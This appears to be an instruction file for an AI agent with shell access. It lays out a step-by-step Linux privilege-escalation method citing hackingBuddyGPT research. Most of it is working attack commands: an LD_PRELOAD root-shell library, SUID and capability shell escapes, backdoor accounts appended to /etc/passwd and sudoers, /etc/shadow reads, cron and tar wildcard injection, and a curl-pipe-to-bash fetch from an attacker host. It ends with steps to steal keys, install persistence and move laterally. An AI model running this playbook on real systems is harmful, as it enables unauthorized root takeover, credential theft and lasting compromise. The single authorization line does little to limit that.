| name | linux-privesc-enum |
| description | Systematic Linux privilege-escalation enumeration methodology — ordered phases covering sudo, SUID/SGID, capabilities, cron, writable paths, NFS, kernel CVEs, and GTFOBins lookup, grounded in LLM-assisted autonomous privesc research (hackingBuddyGPT/ipa-lab). |
| allowed-tools | Bash Read Write |
| metadata | {"subdomain":"privilege-escalation","when_to_use":"linux privesc enumeration, GTFOBins, SUID methodology, linux privilege escalation order, capabilities enumeration, cron abuse linux, NFS no_root_squash, kernel suggester, systematic privesc","tags":"linux, privesc, enumeration, gtfobins, suid, sudo, capabilities, cron, kernel, nfs, methodology","mitre_attack":"T1548.001, T1053.003, T1068, T1574.006, T1552.001, T1611"} |
Linux Privilege Escalation — Systematic Enumeration Methodology
Grounded in autonomous privesc research (Happe & Cito, ESEC/FSE 2023 — hackingBuddyGPT) which empirically validated that ordered, phase-driven enumeration with state tracking outperforms ad hoc command execution. Follow phases in priority order; stop at first exploitable finding and validate before moving to the next phase.
Authorized use only. Run only on systems you own or have explicit written permission to test.
Phase 0 — Situational Awareness (always first)
Establish identity, OS, and architecture before anything else. Every later phase depends on this context.
id; whoami; groups; cat /proc/$$/status | grep -E 'Uid|Gid|Groups'
uname -a
cat /etc/os-release 2>/dev/null || cat /etc/issue
cat /proc/version
env | grep -iE 'path|home|sudo|pass|token|secret|key'
echo $PATH
ip addr show 2>/dev/null || ifconfig
ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null
cat /etc/hosts
ps auxf 2>/dev/null | grep -v '\[' | head -40
Phase 1 — Sudo (highest yield, lowest noise)
Sudo misconfigurations are the most common finding in CTFs and enterprise systems alike.
sudo -l 2>/dev/null
GTFOBins lookup workflow
For any allowed binary, check https://gtfobins.github.io/#?sudo — filter for "sudo" column.
Sudo env_keep abuse
cat > /tmp/pe.c << 'EOF'
void __attribute__((constructor)) init() {
setuid(0); setgid(0);
system("/bin/bash -p");
}
EOF
gcc -fPIC -shared -nostartfiles -o /tmp/pe.so /tmp/pe.c
sudo LD_PRELOAD=/tmp/pe.so <any_allowed_command>
Phase 2 — SUID / SGID Binaries
find / -perm -4000 -type f 2>/dev/null | sort
find / -perm -2000 -type f 2>/dev/null | sort
KNOWN_SUID=(bash sh dash find python python3 perl ruby php node env vim vi nano nmap curl wget cp mv tee tar zip less more man ftp ssh socat strace tcpdump openssl)
for bin in "${KNOWN_SUID[@]}"; do
find / -name "$bin" -perm -4000 2>/dev/null
done
Common SUID exploitation patterns
/bin/bash -p
/usr/bin/find / -name "x" -exec /bin/bash -p \; -quit
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
/usr/bin/vim -c ':python3 import os; os.setuid(0); os.execl("/bin/bash","bash","-p")'
/usr/bin/vim -c ':!bash -p'
/usr/bin/nmap --interactive
openssl passwd -1 -salt salt hackme
echo 'root2:$1$salt$<hash>:0:0:root:/root:/bin/bash' >> /tmp/newpasswd
/usr/bin/cp /tmp/newpasswd /etc/passwd
su root2
/usr/bin/env /bin/bash -p
echo 'www-data ALL=(ALL) NOPASSWD: ALL' | /usr/bin/tee -a /etc/sudoers
Phase 3 — Linux Capabilities
Capabilities are frequently overlooked and often not caught by basic linPEAS runs on hardened systems.
getcap -r / 2>/dev/null
Capability exploitation
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
/usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
/usr/bin/ruby -e 'Process::Sys.setuid(0); exec "/bin/bash"'
/usr/bin/tar xf /etc/shadow -I 'cat > /tmp/shadow'
python3 -c "
import ctypes, sys
libc = ctypes.CDLL(None)
libc.open.restype = ctypes.c_int
fd = libc.open('/etc/shadow', 0)
buf = ctypes.create_string_buffer(4096)
libc.read(fd, buf, 4096)
sys.stdout.buffer.write(buf.raw)
"
tcpdump -i any -w /tmp/cap.pcap &
Phase 4 — Cron Jobs and Scheduled Tasks
cat /etc/crontab
ls -la /etc/cron.d/ 2>/dev/null
ls -la /etc/cron.{hourly,daily,weekly,monthly}/ 2>/dev/null
crontab -l 2>/dev/null
ls -la /var/spool/cron/crontabs/ 2>/dev/null
for script in $(grep -oP '(?<= )(/[^ ]+\.sh)' /etc/crontab 2>/dev/null); do
ls -la "$script" 2>/dev/null
done
./pspy64 2>/dev/null | tee /tmp/pspy.txt &
sleep 120; kill %1
grep -iE 'root|CRON|UID=0' /tmp/pspy.txt
Cron exploitation patterns
echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /opt/scripts/backup.sh
/tmp/rootbash -p
mkdir -p /home/user/bin
cat > /home/user/bin/script.sh << 'EOF'
cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash
EOF
chmod +x /home/user/bin/script.sh
cd /target
echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' > shell.sh
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh shell.sh'
Phase 5 — Writable Files and Path Injection
find / -writable -type d 2>/dev/null | grep -vE '^/(proc|sys|dev|tmp|run)'
find / -writable -type f -user root 2>/dev/null | grep -vE '^/(proc|sys)'
echo $PATH | tr ':' '\n' | xargs -I{} find {} -writable -type f 2>/dev/null
ls -la /etc/passwd
[ -w /etc/passwd ] && echo "WRITABLE /etc/passwd"
openssl passwd -1 -salt abc hackme
echo 'hacker:$1$abc$<hash>:0:0:root:/root:/bin/bash' >> /etc/passwd
su hacker
ls -la /etc/sudoers /etc/sudoers.d/ 2>/dev/null
find / -name "*.so" -writable 2>/dev/null | grep -vE '^/(proc|sys)'
Phase 6 — NFS No-Root-Squash
cat /etc/exports 2>/dev/null
showmount -e <TARGET_IP>
mkdir /tmp/nfsmount
mount -t nfs <TARGET_IP>:/share /tmp/nfsmount
cp /bin/bash /tmp/nfsmount/rootbash
chmod +s /tmp/nfsmount/rootbash
/share/rootbash -p
Phase 7 — Kernel and Polkit CVEs
Run only after confirming no higher-yield misconfiguration exists. Kernel exploits risk system instability.
uname -a
cat /etc/os-release
./linux-exploit-suggester.sh 2>/dev/null | grep -A3 'CVE'
dpkg -l policykit-1 2>/dev/null || rpm -qa polkit 2>/dev/null
uname -r | awk -F. '{if ($1==5 && $2>=8 && $2<=16) print "POTENTIAL DirtyPipe"}'
Automated Enumeration (supplement, do not replace manual phases)
curl -sSL https://<ATTACKER_IP>/linpeas.sh | bash 2>/dev/null | tee /tmp/linpeas.txt
./linpeas.sh -a 2>/dev/null | tee /tmp/linpeas_$(hostname).txt
./pspy64 | tee /tmp/pspy_$(hostname).txt
./lse.sh -l 1 2>/dev/null
./lse.sh -l 2 2>/dev/null
Enumeration State Tracking (hackingBuddyGPT methodology)
Research (Happe & Cito 2023) shows that maintaining a running state of what has been tried and what the current system profile looks like dramatically reduces redundant commands and improves escalation success rates. Keep a local note:
TARGET: <hostname>
USER: <current user>
KERNEL: <uname output>
SUDO: <sudo -l output>
SUID_HITS: <list>
CAPS_HITS: <list>
CRON_HITS: <list>
WRITABLE_HITS: <list>
TRIED: <list of failed vectors>
NEXT: <prioritized queue>
This mirrors the update_state / sliding history pattern that hackingBuddyGPT uses to prevent the LLM (or human operator) from re-attempting exhausted vectors.
MITRE ATT&CK Mapping
| Technique | ID | Vector |
|---|
| Abuse Elevation Control Mechanism: Setuid/Setgid | T1548.001 | SUID/SGID exploitation |
| Scheduled Task/Job: Cron | T1053.003 | Cron job abuse, wildcard injection |
| Exploitation for Privilege Escalation | T1068 | Kernel CVEs, PwnKit, DirtyPipe |
| Hijack Execution Flow: Dynamic Linker Hijacking | T1574.006 | LD_PRELOAD, writable .so |
| Unsecured Credentials: Credentials In Files | T1552.001 | World-readable config/env files |
| Escape to Host | T1611 | NFS no_root_squash, container escapes |
Decision Flow
Phase 0: situational awareness
|
v
Phase 1: sudo -l ──► hit? exploit immediately
|
v
Phase 2: SUID/SGID ──► cross-ref GTFOBins ──► hit? exploit
|
v
Phase 3: getcap -r / ──► cap_setuid/dac_read? exploit
|
v
Phase 4: cron (cat /etc/crontab + pspy) ──► writable script? inject
|
v
Phase 5: writable /etc/passwd, sudoers, PATH ──► exploit
|
v
Phase 6: NFS exports no_root_squash ──► SUID binary via mount
|
v
Phase 7: kernel CVEs (linux-exploit-suggester) ──► last resort
After root:
- Read
/etc/shadow → crack offline or pass-the-hash
- Extract SSH private keys from
/root/.ssh/
- Dump
/etc/passwd + /etc/shadow → Credential Access skill
- Install persistence (cron, authorized_keys, SUID backdoor) → Persistence
- Pivot laterally using harvested credentials → Lateral Movement skill